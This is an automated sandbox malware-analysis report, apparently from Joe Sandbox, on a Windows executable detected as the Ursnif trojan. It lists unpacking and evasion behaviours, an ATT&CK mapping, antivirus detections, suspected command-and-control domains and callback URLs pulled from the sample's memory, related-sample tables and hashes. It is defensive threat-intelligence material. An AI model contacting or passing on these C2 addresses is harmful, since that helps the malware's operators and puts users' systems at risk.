Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Command line argument: Petoco	0_2_0042F0A0

Source: C:\Users\user\Desktop\Rats4dIOmA.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\Rats4dIOmA.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: Rats4dIOmA.exe

Static PE information: More than 200 imports for KERNEL32.dll

Source: Rats4dIOmA.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Rats4dIOmA.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Rats4dIOmA.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Rats4dIOmA.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Rats4dIOmA.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Rats4dIOmA.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Rats4dIOmA.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\sax\w.pdb source: Rats4dIOmA.exe
Source:	Binary string: C:\sax\w.pdbP+C source: Rats4dIOmA.exe

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\Rats4dIOmA.exe

Unpacked PE file: 0.2.Rats4dIOmA.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\Rats4dIOmA.exe

Unpacked PE file: 0.2.Rats4dIOmA.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;

Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Code function: 0_2_03C4E9AC push 0B565A71h; ret	0_2_03C4E9B1
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Code function: 0_2_03C4AFAF push ecx; ret	0_2_03C4AFBF
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Code function: 0_2_03C4AC00 push ecx; ret	0_2_03C4AC09
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Code function: 0_2_03C4E62F push edi; retf	0_2_03C4E630
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Code function: 0_2_0042E7D0 push ecx; mov dword ptr [esp], 00000000h	0_2_0042E7D1

Source: C:\Users\user\Desktop\Rats4dIOmA.exe

Code function: 0_2_00401264 LoadLibraryA,GetProcAddress,

0_2_00401264

Source: initial sample

Static PE information: section name: .text entropy: 7.04444899707

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.310816150.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310772228.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310824742.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.518183803.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310739841.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310804717.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310680440.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310789542.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310712356.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Rats4dIOmA.exe PID: 6456, type: MEMORYSTR
Source: Yara match	File source: 0.2.Rats4dIOmA.exe.42b94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Rats4dIOmA.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Rats4dIOmA.exe.42b94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.518140305.00000000042B9000.00000004.00000040.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: C:\Users\user\Desktop\Rats4dIOmA.exe TID: 6852

Thread sleep count: 33 > 30

Jump to behavior

Source: C:\Users\user\Desktop\Rats4dIOmA.exe

Code function: 0_2_00401264 LoadLibraryA,GetProcAddress,

0_2_00401264

Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Code function: 0_2_01FE0D90 mov eax, dword ptr fs:[00000030h]		0_2_01FE0D90
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Code function: 0_2_01FE092B mov eax, dword ptr fs:[00000030h]		0_2_01FE092B

Source: Rats4dIOmA.exe, 00000000.00000002.517827409.00000000027E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: Rats4dIOmA.exe, 00000000.00000002.517827409.00000000027E0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: Rats4dIOmA.exe, 00000000.00000002.517827409.00000000027E0000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: Rats4dIOmA.exe, 00000000.00000002.517827409.00000000027E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: Rats4dIOmA.exe, 00000000.00000002.517827409.00000000027E0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Rats4dIOmA.exe

Code function: 0_2_03C47A2E cpuid

0_2_03C47A2E

Source: C:\Users\user\Desktop\Rats4dIOmA.exe

Code function: 0_2_00401E22 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_00401E22

Source: C:\Users\user\Desktop\Rats4dIOmA.exe

Code function: 0_2_00401752 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_00401752

Source: C:\Users\user\Desktop\Rats4dIOmA.exe

Code function: 0_2_03C47A2E RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_03C47A2E

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.310816150.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310772228.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310824742.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.518183803.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310739841.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310804717.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310680440.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310789542.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310712356.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Rats4dIOmA.exe PID: 6456, type: MEMORYSTR
Source: Yara match	File source: 0.2.Rats4dIOmA.exe.42b94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Rats4dIOmA.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Rats4dIOmA.exe.42b94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.518140305.00000000042B9000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.310816150.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310772228.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310824742.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.518183803.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310739841.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310804717.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310680440.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310789542.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310712356.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Rats4dIOmA.exe PID: 6456, type: MEMORYSTR
Source: Yara match	File source: 0.2.Rats4dIOmA.exe.42b94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Rats4dIOmA.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Rats4dIOmA.exe.42b94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.518140305.00000000042B9000.00000004.00000040.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection1	Virtualization/Sandbox Evasion1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter2	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer4	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing22	NTDS	Account Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	System Owner/User Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Rats4dIOmA.exe	23%	Metadefender		Browse
Rats4dIOmA.exe	45%	ReversingLabs	Win32.Trojan.Chapak
Rats4dIOmA.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.Rats4dIOmA.exe.1fe0e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.Rats4dIOmA.exe.3c40000.2.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
0.2.Rats4dIOmA.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
0.3.Rats4dIOmA.exe.3bf0000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://soderunovos.websitehttps://qoderunovos.websiten	0%	Avira URL Cloud	safe
https://soderunovos.website	0%	Avira URL Cloud	safe
https://qoderunovos.website	0%	Avira URL Cloud	safe
https://soderunovos.website/jdraw/ldez60nkcypupl/Y8k6P2TKljJ3iNZCDUKjs/bDzAl0Dd4aRnqW1G/ctGW3CyINNEj	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
new-fp-shed.wg1.b.yahoo.com	87.248.100.216	true	false	high
yahoo.com	74.6.143.26	true	false	high
www.yahoo.com	unknown	unknown	false	high
qoderunovos.website	unknown	unknown	true	unknown
soderunovos.website	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.yahoo.com/jdraw/hz1bq3PmtqtDPcpAxd/_2FGYs9V_/2BcaIfj8lzbe6dwp1S50/qnf1CtPsO2EGsTOGBt0/TpQo4OHaLh1DZAzOHIElg2/LmJhngmT2kJ_2/FHuNwneH/Olki6SGkOhEdHnRV6_2B266/I71jLcWlaJ/WAM1n0wLbM0TzOock/J5o_2ByTSV9y/SAhEyWB5DMB/4lW4ok5N/nAsrN2WO_/2Fjc4.crw	false		high
https://yahoo.com/jdraw/hz1bq3PmtqtDPcpAxd/_2FGYs9V_/2BcaIfj8lzbe6dwp1S50/qnf1CtPsO2EGsTOGBt0/TpQo4OHaLh1DZAzOHIElg2/LmJhngmT2kJ_2/FHuNwneH/Olki6SGkOhEdHnRV6_2B266/I71jLcWlaJ/WAM1n0wLbM0TzOock/J5o_2ByTSV9y/SAhEyWB5DMB/4lW4ok5N/nAsrN2WO_/2Fjc4.crw	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://soderunovos.websitehttps://qoderunovos.websiten	Rats4dIOmA.exe, 00000000.00000003.310772228.0000000004758000.00000004.00000040.sdmp, Rats4dIOmA.exe, 00000000.00000002.518183803.0000000004758000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
https://soderunovos.website	Rats4dIOmA.exe, 00000000.00000003.310772228.0000000004758000.00000004.00000040.sdmp, Rats4dIOmA.exe, 00000000.00000002.518183803.0000000004758000.00000004.00000040.sdmp	true	Avira URL Cloud: safe	unknown
https://qoderunovos.website	Rats4dIOmA.exe, 00000000.00000003.310772228.0000000004758000.00000004.00000040.sdmp, Rats4dIOmA.exe, 00000000.00000002.518183803.0000000004758000.00000004.00000040.sdmp	true	Avira URL Cloud: safe	unknown
https://www.yahoo.com/k=#	Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	false		high
https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fhz1bq3PmtqtDPcpAxd%2f_2	Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	false		high
https://policies.yahoo.com/w3c/p3p.xml	Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000003.310772228.0000000004758000.00000004.00000040.sdmp, Rats4dIOmA.exe, 00000000.00000003.310833541.000000000475B000.00000004.00000040.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	false		high
https://soderunovos.website/jdraw/ldez60nkcypupl/Y8k6P2TKljJ3iNZCDUKjs/bDzAl0Dd4aRnqW1G/ctGW3CyINNEj	Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.yahoo.com/	Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	false		high
https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=cc0	Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000003.310772228.0000000004758000.00000004.00000040.sdmp, Rats4dIOmA.exe, 00000000.00000003.310833541.000000000475B000.00000004.00000040.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	false		high
https://www.yahoo.com/jdraw/hz1bq3PmtqtDPcpAxd/_2FGYs9V_/2BcaIfj8lzbe6dwp1S50/qnf1CtPsO2EGsTOGBt0/Tp	Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000003.309800668.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000003.310611526.00000000021F3000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
74.6.143.26	yahoo.com	United States		26101	YAHOO-3US	false
87.248.100.216	new-fp-shed.wg1.b.yahoo.com	United Kingdom		34010	YAHOO-IRDGB	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528071
Start date:	24.11.2021
Start time:	18:22:21
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Rats4dIOmA.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@4/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 28.5% (good quality ratio 27.8%) Quality average: 82.4% Quality standard deviation: 26%
HCA Information:	Successful, ratio: 69% Number of executed functions: 50 Number of non-executed functions: 58
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.54.113.53 Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
74.6.143.26	FpYf5EGDO9.exe	Get hash	malicious	Browse
	Fuutbqvhmc.dll	Get hash	malicious	Browse
	X4V4jFmFhO.dll	Get hash	malicious	Browse
	bebys10.dll	Get hash	malicious	Browse
	WGEcMZQA.dll	Get hash	malicious	Browse
	vdbb9MZTVz.dll	Get hash	malicious	Browse
	Information.xlsb	Get hash	malicious	Browse
	V3HZtftyV5.xlsb	Get hash	malicious	Browse
	t6i4DJb8qh.xlsb	Get hash	malicious	Browse
	9Ild0p2cVg.xlsb	Get hash	malicious	Browse
	SecuriteInfo.com.Heur.26846.xlsb	Get hash	malicious	Browse
	Attachment_97680.xlsb	Get hash	malicious	Browse
	Attachment_96948.xlsb	Get hash	malicious	Browse
	Document_89069.xlsb	Get hash	malicious	Browse
	Attachment_777329.xlsb	Get hash	malicious	Browse
	co-Payment.xlsb	Get hash	malicious	Browse
	Presentation_812525.xlsb	Get hash	malicious	Browse
	Document_7647.xlsb	Get hash	malicious	Browse
	Document_7647.xlsb	Get hash	malicious	Browse
	Invoice_52133.xls	Get hash	malicious	Browse
87.248.100.216	FpYf5EGDO9.exe	Get hash	malicious	Browse
	anIV2qJeLD.exe	Get hash	malicious	Browse
	0MGLPJiSa5.dll	Get hash	malicious	Browse
	Fuutbqvhmc.dll	Get hash	malicious	Browse
	X4V4jFmFhO.dll	Get hash	malicious	Browse
	GLpkbbRAp2.dll	Get hash	malicious	Browse
	bebys12.dll	Get hash	malicious	Browse
	loveTubeLike.dll	Get hash	malicious	Browse
	zuroq8.dll	Get hash	malicious	Browse
	zuroq1.dll	Get hash	malicious	Browse
	nextNextLike.dll	Get hash	malicious	Browse
	gVuD2n1r5v.dll	Get hash	malicious	Browse
	BQIyt2B7Im.dll	Get hash	malicious	Browse
	52k0qe3yt3.dll	Get hash	malicious	Browse
	BQIyt2B7Im.dll	Get hash	malicious	Browse
	SayEjNMwtQ.dll	Get hash	malicious	Browse
	uj8A47Ew7u.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W64.Bzrloader.IEldorado.25041.dll	Get hash	malicious	Browse
	powTubeDoor.dll	Get hash	malicious	Browse
	WGEcMZQA.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
new-fp-shed.wg1.b.yahoo.com	FpYf5EGDO9.exe	Get hash	malicious	Browse	87.248.100.216
	anIV2qJeLD.exe	Get hash	malicious	Browse	87.248.100.216
	0MGLPJiSa5.dll	Get hash	malicious	Browse	87.248.100.216
	loveTubeLike.dll	Get hash	malicious	Browse	87.248.100.215
	Fuutbqvhmc.dll	Get hash	malicious	Browse	87.248.100.215
	Antic Cracked.exe	Get hash	malicious	Browse	87.248.100.215
	nesfooF2Q1.exe	Get hash	malicious	Browse	87.248.100.215
	X4V4jFmFhO.dll	Get hash	malicious	Browse	87.248.100.216
	GLpkbbRAp2.dll	Get hash	malicious	Browse	87.248.100.216
	youNextNext.dll	Get hash	malicious	Browse	87.248.100.215
	bebys10.dll	Get hash	malicious	Browse	87.248.100.215
	bebys12.dll	Get hash	malicious	Browse	87.248.100.216
	loveTubeLike.dll	Get hash	malicious	Browse	87.248.100.216
	zuroq8.dll	Get hash	malicious	Browse	87.248.100.216
	zuroq1.dll	Get hash	malicious	Browse	87.248.100.216
	nextNextLike.dll	Get hash	malicious	Browse	87.248.100.215
	TFIw2EIiZh.exe	Get hash	malicious	Browse	87.248.100.215
	Solicitor Inquiry No. 001_4921 - UK.xls	Get hash	malicious	Browse	87.248.100.215
	kANwTlkiJp.dll	Get hash	malicious	Browse	87.248.100.215
	gVuD2n1r5v.dll	Get hash	malicious	Browse	87.248.100.215
yahoo.com	0MGLPJiSa5.dll	Get hash	malicious	Browse	87.248.100.216
	X4V4jFmFhO.dll	Get hash	malicious	Browse	87.248.100.216
	GLpkbbRAp2.dll	Get hash	malicious	Browse	87.248.100.216
	bebys10.dll	Get hash	malicious	Browse	87.248.100.215
	bebys12.dll	Get hash	malicious	Browse	87.248.100.216
	loveTubeLike.dll	Get hash	malicious	Browse	87.248.100.216
	zuroq8.dll	Get hash	malicious	Browse	87.248.100.216
	zuroq1.dll	Get hash	malicious	Browse	87.248.100.216

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
YAHOO-3US	FpYf5EGDO9.exe	Get hash	malicious	Browse	74.6.143.26
	0MGLPJiSa5.dll	Get hash	malicious	Browse	74.6.143.25
	Fuutbqvhmc.dll	Get hash	malicious	Browse	74.6.143.26
	T8H5LF8GlO	Get hash	malicious	Browse	98.139.166.49
	TFEkbH3ag3	Get hash	malicious	Browse	98.139.166.22
	X4V4jFmFhO.dll	Get hash	malicious	Browse	74.6.143.26
	jew.x86	Get hash	malicious	Browse	98.139.166.15
	bebys10.dll	Get hash	malicious	Browse	74.6.143.26
	zD1jpTbFQq	Get hash	malicious	Browse	98.139.130.39
	zuroq8.dll	Get hash	malicious	Browse	74.6.143.25
	zuroq1.dll	Get hash	malicious	Browse	74.6.143.25
	52k0qe3yt3.dll	Get hash	malicious	Browse	74.6.143.25
	SayEjNMwtQ.dll	Get hash	malicious	Browse	74.6.143.25
	uj8A47Ew7u.dll	Get hash	malicious	Browse	74.6.143.25
	b3astmode.arm	Get hash	malicious	Browse	98.139.142.39
	WGEcMZQA.dll	Get hash	malicious	Browse	74.6.143.26
	mzfAM4jLfv.dll	Get hash	malicious	Browse	74.6.143.25
	vdbb9MZTVz.dll	Get hash	malicious	Browse	74.6.143.26
	Update-KB250-x86.exe	Get hash	malicious	Browse	67.195.204.72
	Update-KB2984-x86.exe	Get hash	malicious	Browse	67.195.204.74
YAHOO-IRDGB	FpYf5EGDO9.exe	Get hash	malicious	Browse	212.82.100.140
	anIV2qJeLD.exe	Get hash	malicious	Browse	212.82.100.140
	0MGLPJiSa5.dll	Get hash	malicious	Browse	87.248.100.216
	loveTubeLike.dll	Get hash	malicious	Browse	87.248.100.215
	Fuutbqvhmc.dll	Get hash	malicious	Browse	87.248.100.216
	X4V4jFmFhO.dll	Get hash	malicious	Browse	87.248.100.216
	GLpkbbRAp2.dll	Get hash	malicious	Browse	87.248.100.216
	iKuUJ0F8Du	Get hash	malicious	Browse	87.248.96.208
	youNextNext.dll	Get hash	malicious	Browse	87.248.100.215
	bebys10.dll	Get hash	malicious	Browse	87.248.100.215
	bebys12.dll	Get hash	malicious	Browse	87.248.100.216
	loveTubeLike.dll	Get hash	malicious	Browse	87.248.100.216
	zuroq8.dll	Get hash	malicious	Browse	87.248.100.216
	zuroq1.dll	Get hash	malicious	Browse	87.248.100.216
	nextNextLike.dll	Get hash	malicious	Browse	87.248.100.216
	kANwTlkiJp.dll	Get hash	malicious	Browse	87.248.100.215
	gVuD2n1r5v.dll	Get hash	malicious	Browse	87.248.100.216
	#Ud83d#Udce0TetratecheFaxNOV03 xti.htm	Get hash	malicious	Browse	212.82.100.181
	BQIyt2B7Im.dll	Get hash	malicious	Browse	87.248.100.216
	52k0qe3yt3.dll	Get hash	malicious	Browse	87.248.100.216

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	XP-SN-7843884.htm	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	XP-SN-8324655.htm	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	new-1834138397.xls	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	1.htm	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	FACTURAS.exe	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	new-1179494065.xls	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	Arrival Notice, CIA Awb Inv Form.pdf.exe	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	TT-PRIME USD242,357,59.ppam	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	chase.xls	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	Statement from QNB.exe	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	private-1915056036.xls	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	private-1910485378.xls	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	doc201002124110300200.exe	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	t 2021.HtML	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	INVOICE - FIRST 2 CONTAINERS 1110.docx	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	INVOICE - FIRST 2 CONTAINERS 1110.docx	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	Justificante.exe	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	muhammadbad.html	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	MtCsSK9TK2.exe	Get hash	malicious	Browse	87.248.100.216 74.6.143.26
	0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Get hash	malicious	Browse	87.248.100.216 74.6.143.26

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.833285470480499
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Rats4dIOmA.exe
File size:	302080
MD5:	76a29095e02a151adc1f42ec844a65bd
SHA1:	afd4593a0e709a11296556d5b1fb1833bb394c4d
